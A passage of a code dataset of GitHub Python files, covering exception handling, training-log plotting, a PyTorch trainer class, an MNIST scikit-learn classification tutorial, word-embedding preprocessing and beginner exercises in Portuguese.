Exception\n# class Calculator(object):\n# def multiply(value_1, value_2):\n# return value_1 * value_2\n#\n# def add(value_1, value_2):\n# return value_1 + value_2\n#\n# def divide(value_1, value_2):\n# raise NotImplementedError('Not implemented yet!')\n#\n#\n# print(Calculator.multiply(2, 6))\n# print(Calculator.add(2, 6))\n# print(Calculator.divide(2, 6))\n\n\n# Raise in practice\ndef unsafe_calculate_percent(value, total):\n try:\n return value * 100 / total\n except TypeError:\n raise ValueError(f'Invalid values! {value} and {total} must be a valid number!')\n except ZeroDivisionError:\n raise ValueError(f'Invalid values! 
{value} and {total} must be a valid number!')\n\n\ndef safe_calculate_percent(value, total):\n try:\n percent = unsafe_calculate_percent(value, total)\n except ValueError as value_error:\n print(value_error)\n else:\n print(f'{value} from {total} is {percent}%')\n\n\nsafe_calculate_percent(1, 2)\nsafe_calculate_percent('1', 2)\nsafe_calculate_percent('a', None)\nsafe_calculate_percent(28, 0)\nsafe_calculate_percent(50, 99)","repo_name":"SylWit94/Learning-of-Python-and-Selenium","sub_path":"Python_2/try_except.py","file_name":"try_except.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10647438220","text":"\"\"\"\nGiven a training log file, plot something.\n\"\"\"\nimport csv\nimport matplotlib.pyplot as plt\n\ndef main(training_log):\n with open(training_log) as fin:\n reader = csv.reader(fin)\n next(reader, None) # skip the header\n val_accuracies = []\n val_losses = []\n accs = []\n losss = []\n top_5_accuracies = []\n top_5_loss = []\n ep = []\n cnn_benchmark = [] # this is ridiculous\n for epoch,acc,loss,top_k_categorical_accuracy,val_acc,val_loss,val_top_k_categorical_accuracy in reader:\n val_accuracies.append(float(val_acc))\n top_5_accuracies.append(float(val_top_k_categorical_accuracy))\n val_losses.append(float(val_loss))\n accs.append(float(acc))\n losss.append(float(loss))\n ep.append(int(epoch))\n\n # plt.plot(val_accuracies)\n # plt.plot(accs)\n # plt.xlabel(\"epoch\")\n # plt.ylabel(\"accuracy\")\n # plt.title(\"Accuracy of a 100-Frame Sequence\")\n # plt.legend(['validation','training'], loc='lower right')\n\n plt.title(\"Loss of a 100-Frame Sequence\")\n plt.plot(val_losses)\n plt.plot(losss)\n plt.ylabel(\"loss\")\n plt.xlabel(\"epoch\")\n plt.legend(['validation','training'], loc='upper right')\n\n # plt.plot(top_5_accuracies)\n plt.show()\n\nif __name__ == '__main__':\n# 80\n # lstm-training-1559101864.9963527\n # lstm-training-1559111706.9777737\n\n# 90\n # lstm-training-1557119933.7469792\n # lstm-training-1557084128.406245\n\n# 100\n # lstm-training-1559536009.4090457\n # lstm-training-1559532020.046076\n # # lstm-training-1559258359.0995955\n # # lstm-training-1559528792.43136\n\n training_log = 'data/logs/lstm-training-1559536009.4090457.log'\n main(training_log)","repo_name":"ckftahadlangit/Locking-Dance-Style-Classification","sub_path":"plot_trainlog.py","file_name":"plot_trainlog.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"34828902618","text":"import logging\r\nimport os\r\nfrom collections import defaultdict\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nfrom torch.utils.data import DataLoader\r\nfrom yacs.config import CfgNode\r\n\r\nfrom lib.dataset import build_data_loaders\r\nfrom lib.dataset.utils import get_data_config\r\nfrom lib.models import build_model\r\nfrom lib.models.losses import Accuracy, build_loss\r\nfrom lib.solver import build_lr_scheduler, build_optimizer\r\nfrom lib.utils import AverageMeter, Meters, get_last_n_median, save_checkpoint\r\nfrom lib.utils.writer import CommonMetricPrinter, JSONWriter, TensorboardWriter\r\nfrom typing import Tuple\r\n\r\n\r\nclass BaseTrainer:\r\n \"\"\"class for BaseTrainer\"\"\"\r\n\r\n def __init__(\r\n self, cfg, model, optimizer, l_loader, ul_loader=None, valid_loader=None, test_loader=None\r\n ):\r\n # configuration\r\n model.train()\r\n self.cfg = cfg\r\n 
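# the dataset-specific config and target device below are unpacked from this experiment config\r\n 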
self.data_cfg = get_data_config(cfg)\r\n self.device = cfg.GPU_ID\r\n\r\n # data loaders\r\n self.l_loader = l_loader\r\n self._l_iter = iter(l_loader)\r\n\r\n self.with_ul = ul_loader is not None\r\n if self.with_ul:\r\n self.ul_loader = ul_loader\r\n self._ul_iter = iter(ul_loader)\r\n\r\n self.valid_loader = valid_loader\r\n self.test_loader = test_loader\r\n\r\n # build model and losses\r\n self.model = model\r\n self.accuracy = Accuracy(model.num_classes)\r\n self.l_loss = self.build_labeled_loss(cfg)\r\n\r\n # optimizer\r\n self.optimizer = optimizer\r\n\r\n # scheduler\r\n self.apply_scheduler = cfg.SOLVER.APPLY_SCHEDULER\r\n self.scheduler = self.build_lr_scheduler(cfg, optimizer)\r\n\r\n # training steps\r\n self.start_iter = 0\r\n self.max_iter = cfg.SOLVER.MAX_ITER\r\n\r\n # for logging purpose\r\n self.logger = logging.getLogger()\r\n self.meters = Meters()\r\n self.writers = self._build_writers(cfg)\r\n self.iter_timer = AverageMeter()\r\n self.eval_history = defaultdict(list)\r\n\r\n def load_checkpoint(self, resume: str) -> None:\r\n self.logger.info(f\"resume checkpoint from: {resume}\")\r\n\r\n state_dict = torch.load(resume)\r\n # load model\r\n self.model.load_state_dict(state_dict[\"model\"])\r\n\r\n # load ema model\r\n if self.with_ul and state_dict[\"ema_model\"] is not None:\r\n self.ema_model.load_state_dict(state_dict[\"ema_model\"])\r\n\r\n # load optimizer and scheduler\r\n self.optimizer.load_state_dict(state_dict[\"optimizer\"])\r\n self.scheduler.load_state_dict(state_dict[\"scheduler\"])\r\n\r\n # process meta information\r\n start_iter = 0\r\n meta_dict = state_dict[\"meta\"]\r\n if meta_dict is not None and \"iter\" in meta_dict.keys():\r\n start_iter = meta_dict[\"iter\"] + 1\r\n\r\n dict_str = \" \".join([f\"{k}: {v}\" for k, v in meta_dict.items() if \"iter\" not in k])\r\n self.logger.info(\r\n \"Successfully loaded the checkpoint. 
\"\r\n f\"start_iter: {start_iter} \"\r\n f\"intermediate status: {dict_str}\"\r\n )\r\n\r\n # loaded\r\n self.start_iter = start_iter\r\n\r\n def save_checkpoint(self, *, save_ema_model: bool = False) -> None:\r\n # meta information construction\r\n meta_dict = {\"iter\": self.iter + 1}\r\n for prefix, history in self.eval_history.items():\r\n current_val = history[-1]\r\n max_val = max(history)\r\n meta_dict[prefix] = current_val\r\n meta_dict[prefix + \"_\" + \"best\"] = max_val\r\n meta_dict[prefix + \"_\" + \"median20\"] = get_last_n_median(history, n=20)\r\n\r\n is_best = False\r\n prefix = \"valid/top1\"\r\n if meta_dict[prefix] >= meta_dict[prefix + \"_best\"]:\r\n is_best = True\r\n\r\n is_final_iter = self.iter + 1 == self.max_iter\r\n checkpoint_name = \"model_final.pth.tar\" if is_final_iter else \"checkpoint.pth.tar\"\r\n save_checkpoint(\r\n self.cfg.OUTPUT_DIR,\r\n self.model,\r\n self.optimizer,\r\n self.scheduler,\r\n is_best=is_best,\r\n ema_model=self.ema_model if self.with_ul else None,\r\n meta_dict=meta_dict,\r\n file_name=checkpoint_name\r\n )\r\n\r\n def _build_writers(self, cfg: CfgNode) -> list:\r\n writers = (\r\n [\r\n CommonMetricPrinter(max_iter=self.max_iter),\r\n JSONWriter(os.path.join(self.cfg.OUTPUT_DIR, \"metrics.json\")),\r\n TensorboardWriter(log_dir=self.cfg.OUTPUT_DIR)\r\n ]\r\n )\r\n return writers\r\n\r\n def build_labeled_loss(self, cfg: CfgNode, warmed_up=False) -> nn.Module:\r\n loss_type = cfg.MODEL.LOSS.LABELED_LOSS\r\n num_classes = cfg.MODEL.NUM_CLASSES\r\n assert loss_type == \"CrossEntropyLoss\"\r\n\r\n class_count = self.get_label_dist(device=self.device)\r\n per_class_weights = None\r\n if cfg.MODEL.LOSS.WITH_LABELED_COST_SENSITIVE and warmed_up:\r\n loss_override = cfg.MODEL.LOSS.COST_SENSITIVE.LOSS_OVERRIDE\r\n beta = cfg.MODEL.LOSS.COST_SENSITIVE.BETA\r\n if beta < 1:\r\n # effective number of samples;\r\n effective_num = 1.0 - torch.pow(beta, class_count)\r\n per_class_weights = (1.0 - beta) / effective_num\r\n else:\r\n per_class_weights = 1.0 / class_count\r\n\r\n # sum to num_classes\r\n per_class_weights = per_class_weights / torch.sum(per_class_weights) * num_classes\r\n\r\n if loss_override == \"\":\r\n # CE loss\r\n loss_fn = build_loss(\r\n cfg, loss_type, class_count=class_count, class_weight=per_class_weights\r\n )\r\n\r\n elif loss_override == \"LDAM\":\r\n # LDAM loss\r\n loss_fn = build_loss(\r\n cfg, \"LDAMLoss\", class_count=class_count, class_weight=per_class_weights\r\n )\r\n\r\n else:\r\n raise ValueError()\r\n else:\r\n loss_fn = build_loss(\r\n cfg, loss_type, class_count=class_count, class_weight=per_class_weights\r\n )\r\n\r\n return loss_fn\r\n\r\n @classmethod\r\n def build_model(cls, cfg: CfgNode) -> nn.Module:\r\n model = build_model(cfg)\r\n return model\r\n\r\n @classmethod\r\n def build_optimizer(cls, cfg: CfgNode, model: nn.Module) -> optim.Optimizer:\r\n return build_optimizer(cfg, model)\r\n\r\n @classmethod\r\n def build_lr_scheduler(\r\n cls, cfg: CfgNode, optimizer: optim.Optimizer, override_max_iter=None\r\n ) -> optim.lr_scheduler._LRScheduler:\r\n return build_lr_scheduler(cfg, optimizer, override_max_iter=override_max_iter)\r\n\r\n @classmethod\r\n def build_data_loaders(cls, cfg: CfgNode) -> Tuple[DataLoader]:\r\n return build_data_loaders(cfg)\r\n","repo_name":"ytaek-oh/daso","sub_path":"lib/engine/base_trainer.py","file_name":"base_trainer.py","file_ext":"py","file_size_in_byte":6890,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"51"} 
+{"seq_id":"22381481758","text":"# El siguiente código recupera el conjunto de datos MNIST\r\nfrom sklearn.datasets import fetch_mldata\r\nmnist = fetch_mldata('MNIST original')\r\n\r\nX, y = mnist[\"data\"], mnist[\"target\"]\r\n# X.shape\r\n# y.shape\r\n\r\n#%% Echemos un vistazo a un dígito del conjunto de datos\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\n\r\nsome_digit = X[36000]\r\nsome_digit_image = some_digit.reshape(28, 28)\r\nplt.imshow(some_digit_image, cmap = matplotlib.cm.binary, interpolation=\"nearest\")\r\nplt.axis(\"off\")\r\nplt.show()\r\n\r\ndef plot_digit(data):\r\n image = data.reshape(28, 28)\r\n plt.imshow(image, cmap = matplotlib.cm.binary, interpolation=\"nearest\")\r\n plt.axis(\"off\")\r\n\r\n# y[36000]\r\n\r\n#%% You should always create a test set and set it aside before inspecting the data closely\r\nX_train, X_test, y_train, y_test = X[:60000], X[60000:], y[:60000], y[60000:]\r\n\r\n# Let’s also shuffle the training set\r\nimport numpy as np\r\nshuffle_index = np.random.permutation(60000)\r\nX_train, y_train = X_train[shuffle_index], y_train[shuffle_index]\r\n\r\n#%% Training a Binary Classifier\r\ny_train_5 = (y_train == 5) # True for all 5s, False for all other digits.\r\ny_test_5 = (y_test == 5)\r\n\r\n# now let’s pick a classifier and train it. A good place to start is with a Stochastic\r\n# Gradient Descent (SGD) classifier\r\nfrom sklearn.linear_model import SGDClassifier\r\nsgd_clf = SGDClassifier(random_state=42)\r\nsgd_clf.fit(X_train, y_train_5)\r\n\r\n# Now you can use it to detect images of the number 5\r\nsgd_clf.predict([some_digit])\r\n\r\n#%% Performance Measures\r\n# Measuring Accuracy Using Cross-Validation\r\n# Remember that K-fold crossvalidation\r\n# means splitting the training set into K-folds (in this case, three), then making\r\n# predictions and evaluating them on each fold using a model trained on the\r\n# remaining folds\r\nfrom sklearn.model_selection import cross_val_score\r\ncross_val_score(sgd_clf, X_train, y_train_5, cv=3, scoring=\"accuracy\")\r\n# Out[28]: array([0.963 , 0.9673, 0.9649])\r\n# Above 95% accuracy\r\n\r\n# veamos un clasificador muy tonto que solo clasifica cada imagen en la clase \"no-5\"\r\nfrom sklearn.base import BaseEstimator\r\n\r\nclass Never5Classifier(BaseEstimator):\r\n def fit(self, X, y=None):\r\n pass\r\n def predict(self, X):\r\n return np.zeros((len(X), 1), dtype=bool)\r\n\r\nnever_5_clf = Never5Classifier()\r\ncross_val_score(never_5_clf, X_train, y_train_5, cv=3, scoring=\"accuracy\")\r\n# Out[32]: array([0.9077 , 0.91095, 0.9103 ])\r\n# That’s right, it has over 90% accuracy! 
This is simply because only about 10% of the\r\n# images are 5s, so if you always guess that an image is not a 5, you will be right about\r\n# 90% of the time.\r\n\r\n#%% Confusion Matrix\r\n# La idea general es contar el número de veces que las instancias de la clase A se clasifican como clase B.\r\nfrom sklearn.model_selection import cross_val_predict\r\ny_train_pred = cross_val_predict(sgd_clf, X_train, y_train_5, cv=3)\r\n\r\nfrom sklearn.metrics import confusion_matrix\r\nconfusion_matrix(y_train_5, y_train_pred)\r\n# Out[36]:\r\n# array([[53843, 736],\r\n# [ 1360, 4061]], dtype=int64)\r\n\r\n# Each row in a confusion matrix represents an actual class, while each column represents\r\n# a predicted class\r\n# The first row of this matrix considers non-5 images (the negative\r\n# class): 53543 of them were correctly classified as non-5s (they are called true\r\n# negatives), while the remaining 736 were wrongly classified as 5s (false positives).\r\n# The second row considers the images of 5s (the positive class): 1360 were wrongly\r\n# classified as non-5s (false negatives), while the remaining 4061 were correctly classified\r\n# as 5s (true positives)\r\n\r\n# Precision and Recall\r\n# precision = TP / (TP + FP)\r\n# recall = TP / (TP + FN)\r\nfrom sklearn.metrics import precision_score, recall_score\r\nprecision_score(y_train_5, y_train_pred)\r\n# Out[38]: 0.8465707734000417\r\nrecall_score(y_train_5, y_train_pred)\r\n# Out[39]: 0.7491237779007563\r\n\r\n# Cuando afirma que una imagen representa un 5, es correcta solo el 84% del tiempo.\r\n# Además, solo detecta el 74% de los 5s.\r\n\r\n# It is often convenient to combine precision and recall into a single metric called the F1\r\n# score, in particular if you need a simple way to compare two classifiers. The F1 score is\r\n# the harmonic mean of precision and recall\r\nfrom sklearn.metrics import f1_score\r\nf1_score(y_train_5, y_train_pred)\r\n# Out[40]: 0.7948717948717948\r\n\r\n\r\n# Precision/Recall Tradeoff\r\n\r\n# Instead of calling the classifier’s\r\n# predict() method, you can call its decision_function() method, which returns a\r\n# score for each instance, and then make predictions based on those scores using any\r\n# threshold you want\r\ny_scores = sgd_clf.decision_function([some_digit])\r\ny_scores\r\n# Out[4]: array([110733.94625458])\r\nthreshold = 0\r\ny_some_digit_pred = (y_scores > threshold)\r\ny_some_digit_pred\r\n# Out[6]: array([ True])\r\n\r\nthreshold = 200000\r\ny_some_digit_pred = (y_scores > threshold)\r\ny_some_digit_pred\r\n# Out[7]: array([False])\r\n\r\n# This confirms that raising the threshold decreases recall. 
The image actually represents\r\n# a 5, and the classifier detects it when the threshold is 0, but it misses it when the\r\n# threshold is increased to 200,000.\r\n\r\n# So how can you decide which threshold to use?\r\ny_scores = cross_val_predict(sgd_clf, X_train, y_train_5, cv=3, method=\"decision_function\")\r\n\r\n# Now with these scores you can compute precision and recall for all possible thresholds\r\n# using the precision_recall_curve() function\r\n\r\nfrom sklearn.metrics import precision_recall_curve\r\nprecisions, recalls, thresholds = precision_recall_curve(y_train_5, y_scores)\r\n\r\ndef plot_precision_recall_vs_threshold(precisions, recalls, thresholds):\r\n plt.plot(thresholds, precisions[:-1], \"b--\", label=\"Precision\")\r\n plt.plot(thresholds, recalls[:-1], \"g-\", label=\"Recall\")\r\n plt.xlabel(\"Threshold\")\r\n plt.legend(loc=\"upper left\")\r\n plt.ylim([0, 1])\r\n plt.title(\"Precision and recall versus the decision threshold\")\r\n plt.grid()\r\n\r\nplot_precision_recall_vs_threshold(precisions, recalls, thresholds)\r\nplt.show()\r\n\r\n# Now you can simply select the threshold value that gives you the best precision/recall\r\n# tradeoff for your task\r\n\r\n# So let’s suppose you decide to aim for 90% precision. You look up the first plot\r\n# (zooming in a bit) and find that you need to use a threshold of about 51309. To make\r\n# predictions (on the training set for now), instead of calling the classifier’s predict()\r\n# method, you can just run this code\r\ny_train_pred_90 = (y_scores > 51309)\r\nprecision_score(y_train_5, y_train_pred_90)\r\n# Out[23]: 0.8999016232169208\r\nrecall_score(y_train_5, y_train_pred_90)\r\n# Out[24]: 0.6749677181331858\r\n\r\n#%% The receiver operating characteristic (ROC)\r\n# the ROC curve plots the true positive rate (another name\r\n# for recall) against the false positive rate\r\nfrom sklearn.metrics import roc_curve\r\nfpr, tpr, thresholds = roc_curve(y_train_5, y_scores)\r\n\r\ndef plot_roc_curve(fpr, tpr, label=None):\r\n plt.plot(fpr, tpr, linewidth=2, label=label)\r\n plt.plot([0, 1], [0, 1], 'k--')\r\n plt.axis([0, 1, 0, 1])\r\n plt.xlabel('False Positive Rate')\r\n plt.ylabel('True Positive Rate')\r\n plt.title(\"FPR against the TPR\")\r\n plt.grid()\r\n\r\nplot_roc_curve(fpr, tpr)\r\nplt.show()\r\n\r\n# One way to compare classifiers is to measure the area under the curve (AUC).\r\n# A perfect classifier will have a ROC AUC equal to 1\r\nfrom sklearn.metrics import roc_auc_score\r\nroc_auc_score(y_train_5, y_scores)\r\n# Out[28]: 0.9643213182731702\r\n\r\n# Let’s train a RandomForestClassifier and compare its ROC curve and ROC AUC\r\n# score to the SGDClassifier\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nforest_clf = RandomForestClassifier(random_state=42)\r\ny_probas_forest = cross_val_predict(forest_clf, X_train, y_train_5, cv=3, method=\"predict_proba\")\r\n\r\ny_scores_forest = y_probas_forest[:, 1] # score = proba of positive class\r\nfpr_forest, tpr_forest, thresholds_forest = roc_curve(y_train_5,y_scores_forest)\r\n\r\nplt.plot(fpr, tpr, \"b:\", label=\"SGD\")\r\nplot_roc_curve(fpr_forest, tpr_forest, \"Random Forest\")\r\nplt.legend(loc=\"lower right\")\r\nplt.show()\r\n# the RandomForestClassifier’s ROC curve looks much\r\n# better than the SGDClassifier’s: it comes much closer to the top-left corner\r\n\r\nroc_auc_score(y_train_5, y_scores_forest)\r\n# Out[35]: 0.9930241854404718\r\n\r\n\r\n#%% Multiclass Classification\r\nsgd_clf.fit(X_train, y_train) # y_train, not 
y_train_5\r\nsgd_clf.predict([some_digit])\r\n# Out[36]: array([5.])\r\n\r\nsome_digit_scores = sgd_clf.decision_function([some_digit])\r\nsome_digit_scores\r\n# Out[37]:\r\n# array([[-144544.32935261, -468242.9475172 , -402736.0614126 ,\r\n# -224430.32617788, -464528.52072681, 110733.94625458,\r\n# -567203.44947276, -472713.16588395, -683068.6746175 ,\r\n# -494461.82529041]])\r\n# The highest score is indeed the one corresponding to class 5\r\n\r\nnp.argmax(some_digit_scores)\r\n# Out[38]: 5\r\nsgd_clf.classes_\r\n# Out[39]: array([0., 1., 2., 3., 4., 5., 6., 7., 8., 9.])\r\nsgd_clf.classes_[5]\r\n# Out[41]: 5.0\r\n\r\nfrom sklearn.multiclass import OneVsOneClassifier\r\novo_clf = OneVsOneClassifier(SGDClassifier(random_state=42))\r\novo_clf.fit(X_train, y_train)\r\novo_clf.predict([some_digit])\r\n# Out[42]: array([5.])\r\nlen(ovo_clf.estimators_)\r\n# Out[43]: 45\r\n\r\n# Training a RandomForestClassifier is just as easy\r\n# from sklearn.ensemble import RandomForestClassifier\r\n# forest_clf = RandomForestClassifier(random_state=42)\r\nforest_clf.fit(X_train, y_train)\r\nforest_clf.predict([some_digit])\r\n# Out[44]: array([5.])\r\nforest_clf.predict_proba([some_digit])\r\n# Out[45]: array([[0., 0., 0., 0., 0., 1., 0., 0., 0., 0.]])\r\n\r\ncross_val_score(sgd_clf, X_train, y_train, cv=3, scoring=\"accuracy\")\r\n# Out[46]: array([0.8704759 , 0.85054253, 0.84927739])\r\n\r\n# simply scaling the inputs increases accuracy above 91%\r\nfrom sklearn.preprocessing import StandardScaler\r\nscaler = StandardScaler()\r\nX_train_scaled = scaler.fit_transform(X_train.astype(np.float64))\r\ncross_val_score(sgd_clf, X_train_scaled, y_train, cv=3, scoring=\"accuracy\")\r\n# Out[47]: array([0.91106779, 0.90869543, 0.91153673])\r\n\r\n\r\n#%% Error Analysis\r\n# First, you can look at the confusion matrix. You need to make predictions using the\r\n# cross_val_predict() function, then call the confusion_matrix() function\r\ny_train_pred = cross_val_predict(sgd_clf, X_train_scaled, y_train, cv=3)\r\nconf_mx = confusion_matrix(y_train, y_train_pred)\r\nconf_mx\r\n\r\nplt.matshow(conf_mx, cmap=plt.cm.gray)\r\nplt.show()\r\n\r\n# Let’s focus the plot on the errors. 
First, you need to divide each value in the confusion\r\n# matrix by the number of images in the corresponding class, so you can compare error\r\n# rates instead of absolute number of errors\r\nrow_sums = conf_mx.sum(axis=1, keepdims=True)\r\nnorm_conf_mx = conf_mx / row_sums\r\n\r\n# Now let’s fill the diagonal with zeros to keep only the errors, and let’s plot the result\r\nnp.fill_diagonal(norm_conf_mx, 0)\r\nplt.matshow(norm_conf_mx, cmap=plt.cm.gray)\r\nplt.show()\r\n\r\n# Looking at this plot, it seems that your efforts should be spent on improving\r\n# classification of 8s and 9s, as well as fixing the specific 3/5 confusion\r\n# let’s plot examples of 3s and 5s\r\ncl_a, cl_b = 3, 5\r\nX_aa = X_train[(y_train == cl_a) & (y_train_pred == cl_a)]\r\nX_ab = X_train[(y_train == cl_a) & (y_train_pred == cl_b)]\r\nX_ba = X_train[(y_train == cl_b) & (y_train_pred == cl_a)]\r\nX_bb = X_train[(y_train == cl_b) & (y_train_pred == cl_b)]\r\n\r\ndef plot_digits(instances, images_per_row=10, **options):\r\n size = 28\r\n images_per_row = min(len(instances), images_per_row)\r\n images = [instance.reshape(size,size) for instance in instances]\r\n n_rows = (len(instances) - 1) // images_per_row + 1\r\n row_images = []\r\n n_empty = n_rows * images_per_row - len(instances)\r\n images.append(np.zeros((size, size * n_empty)))\r\n for row in range(n_rows):\r\n rimages = images[row * images_per_row : (row + 1) * images_per_row]\r\n row_images.append(np.concatenate(rimages, axis=1))\r\n image = np.concatenate(row_images, axis=0)\r\n plt.imshow(image, cmap = matplotlib.cm.binary, **options)\r\n plt.axis(\"off\")\r\n\r\n\r\nplt.figure(figsize=(8,8))\r\nplt.subplot(221); plot_digits(X_aa[:25], images_per_row=5)\r\nplt.subplot(222); plot_digits(X_ab[:25], images_per_row=5)\r\nplt.subplot(223); plot_digits(X_ba[:25], images_per_row=5)\r\nplt.subplot(224); plot_digits(X_bb[:25], images_per_row=5)\r\nplt.show()\r\n\r\n\r\n#%% Multilabel Classification\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\n\r\ny_train_large = (y_train >= 7)\r\ny_train_odd = (y_train % 2 == 1)\r\ny_multilabel = np.c_[y_train_large, y_train_odd]\r\n\r\nknn_clf = KNeighborsClassifier()\r\nknn_clf.fit(X_train, y_multilabel)\r\n\r\n# This code creates a y_multilabel array containing two target labels for each digit\r\n# image: the first indicates whether or not the digit is large (7, 8, or 9) and the second\r\n# indicates whether or not it is odd\r\nknn_clf.predict([some_digit])\r\n# Out[20]: array([[False, True]])\r\n\r\n# This code computes the average F1 score across all labels\r\n# Warning: the following cell may take a very long time (possibly hours depending on your hardware).\r\n# y_train_knn_pred = cross_val_predict(knn_clf, X_train, y_train, cv=3)\r\n# f1_score(y_train, y_train_knn_pred, average=\"macro\")\r\n\r\n#%% Multioutput Classification\r\n# Let’s start by creating the training and test sets by taking the MNIST images and\r\n# adding noise to their pixel intensities using NumPy’s randint() function. 
The target\r\n# images will be the original images\r\nnoise = np.random.randint(0, 100, (len(X_train), 784))\r\nX_train_mod = X_train + noise\r\nnoise = np.random.randint(0, 100, (len(X_test), 784))\r\nX_test_mod = X_test + noise\r\n\r\ny_train_mod = X_train\r\ny_test_mod = X_test\r\n\r\nsome_index = 5500\r\nplt.subplot(121); plot_digit(X_test_mod[some_index])\r\nplt.subplot(122); plot_digit(y_test_mod[some_index])\r\nplt.show()\r\n\r\nknn_clf.fit(X_train_mod, y_train_mod)\r\nclean_digit = knn_clf.predict([X_test_mod[some_index]])\r\nplot_digit(clean_digit)\r\n","repo_name":"ranchirino/machine-learning-with-scikit-learn-and-tensorflow","sub_path":"3_mnist.py","file_name":"3_mnist.py","file_ext":"py","file_size_in_byte":13978,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"9900013694","text":"import pandas as pd\nimport jieba\nimport re\nimport numpy as np\nfrom gensim.models import Word2Vec\n\n\njieba.set_dictionary('dict.txt.big.txt')\nmodel = Word2Vec.load('word_embedding.wv')\n\n\ndef embedding_map(product_name):\n # product_name = df['product name'].tolist()\n segment_sentence = []\n temp_list = [''.join(re.split(r'\\W+', sentence.lower())) for sentence in product_name]\n lens = []\n extra_list = []\n after_cut_list = []\n for sentence in temp_list:\n text = jieba.lcut_for_search(sentence)\n text_length = len(text)\n lens.append(text_length)\n after_cut_list.append(text)\n max_length = max(lens)\n for sent_list in after_cut_list:\n tem_word_list = []\n for word in sent_list:\n try:\n word_vector = model.wv[word]\n tem_word_list.append(word_vector)\n # print(word_vector)\n except:\n print(word)\n extra_list.append([word])\n sent_length = len(tem_word_list)\n if sent_length < max_length:\n for i in range(max_length - sent_length):\n tem_word_list.append(np.zeros(400))\n\n segment_sentence.append(np.array(tem_word_list))\n return np.array(segment_sentence), max_length, extra_list\n\ndef clean_files(train, test):\n df = pd.read_csv(train,\n names=['product name', 'category', 'query', 'event', 'date'])\n\n product_name_train = df['product name'].tolist()\n\n query_list = df['query'].tolist()\n\n query_word_list = [sentence.split(' ') for sentence in query_list]\n for ls in query_word_list:\n for word in ls:\n jieba.add_word(word)\n\n segment_sentence_train, length_train, extra_list1 = embedding_map(product_name_train)\n\n label_vector, length_label, extra_list3 = embedding_map(query_list)\n # for i in query_list:\n # label_vector.append(model.wv[i])\n\n\n\n # category_list = df['category'].tolist()\n # category_label = []\n # for i in category_list:\n # if i == 'Male Fashion':\n # category_label.append(1)\n # elif i == 'Female Fastion':\n # category_label.append(2)\n # elif i == 'Mobile & Gadgets':\n # category_label.append(3)\n #\n # event_list = df['event'].tolist()\n # event_label = []\n # for i in event_list:\n # if i == 'Impression':\n # event_label.append(1)\n # else:\n # event_label.append(0)\n\n\n df2 = pd.read_csv(test)\n\n product_name_test = df2['Product Name'].tolist()\n\n segment_sentence_test, length_test, extra_list2 = embedding_map(product_name_test)\n\n\n return segment_sentence_train, length_train, label_vector, segment_sentence_test, length_test, length_label , extra_list1, extra_list2, 
extra_list3\n\n","repo_name":"RykerC/shop_keyword","sub_path":"pre_process.py","file_name":"pre_process.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40300564494","text":"from noc.core.loader.base import BaseLoader\nfrom .base import BaseDownloader\n\n\nclass DownloaderLoader(BaseLoader):\n name = \"downloader\"\n ignored_names = {\"base\", \"loader\"}\n base_cls = BaseDownloader\n base_path = (\"main\", \"refbooks\", \"downloaders\")\n\n\n# Create singleton object\nloader = DownloaderLoader()\n","repo_name":"nocproject/noc","sub_path":"main/refbooks/downloaders/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"51"} +{"seq_id":"40114887196","text":"#exercicio1\n#Faça um Programa que peça um valor e mostre na tela se o valor é positivo ou negativo.\n\n# num = int(input('Digite um numero:'))\n#\n# if num > 0 :\n# print('Positivo')\n# elif num == 0:\n# print('Neutro')\n# else:\n# print('Negativo')\n\n#exercicio2\n#Faça um Programa que peça dois números e imprima o maior deles.\n# num1 = int(input('Digite o primeiro numero: '))\n# num2 = int(input('Digite o segundo numero: '))\n#\n# if num1 > num2 :\n# print('Primerio numero maior com valor: {}'.format(num1))\n# elif num2 == num1:\n# print('Os numeros são iguais')\n# else:\n# print('Segundo numero maior com valor: {}'.format(num2))\n\n#exercicio7\n#Crie um programa que peça uma nota de trabalho e uma de prova (as duas de 0 a 100).\n#Se a média aritmética das notas for maior ou igual a 60, escreva “Aprovado”, se não, “Reprovado”.\n\n# nota = int(input('Digite a nota do trabalho: '))\n#\n# if nota >= 60:\n# print('Aprovado')\n# else:\n# print('Reprovado')\n\n#exercicio10\n#Construa um programa que mostre menu exatamente como o exemplo abaixo e implemente as funções necessárias:\n#== Menu de Opções ==\n# 1. Somar 2 números\n# 2. Potência de um número\n# 3. Raiz de grau N\n#== Opção escolhida:\ndef somar():\n num1 = int(input('Digite o primeiro numero: '))\n num2 = int(input('Digite o segundo numero: '))\n print('Resultado é: {}'.format(num1+num2))\n\ndef potencia():\n num = int(input('Digite o numero: '))\n potencia = int(input('Digite a pontencia: '))\n print('Resultado é: {}'.format(num ** potencia))\n\ndef raiz():\n num = int(input('Numero para achar raiz quadrada: '))\n grau = int(input('Numero para o grau da raiz: '))\n print('Resultado é: {}'.format(num ** (1/grau)))\n\nwhile True :\n print('== Menu de Opções ==')\n print(' 1. Somar 2 números')\n print(' 2. Potência de um número')\n print(' 3. Raiz de grau N ')\n print(' Qualquer tecla pra Sair')\n\nopcao = int(input(\"Opção escolhida\"))\nif opcao == 1:\n somar()\nelif opcao == 2:\n potencia()\nelif opcao == 3:\n raiz()\nelse:\n False\n","repo_name":"fabioshot/topespeciais","sub_path":"3trimestre/exercicios/lista2.py","file_name":"lista2.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"730194068","text":"\"\"\"Colete a idade de duas pessoas.\nE informe se a primeira idade é maior do que a da primeira. Neste aqui, basta responder\nTrue para informar que a primeira idade é maior que a 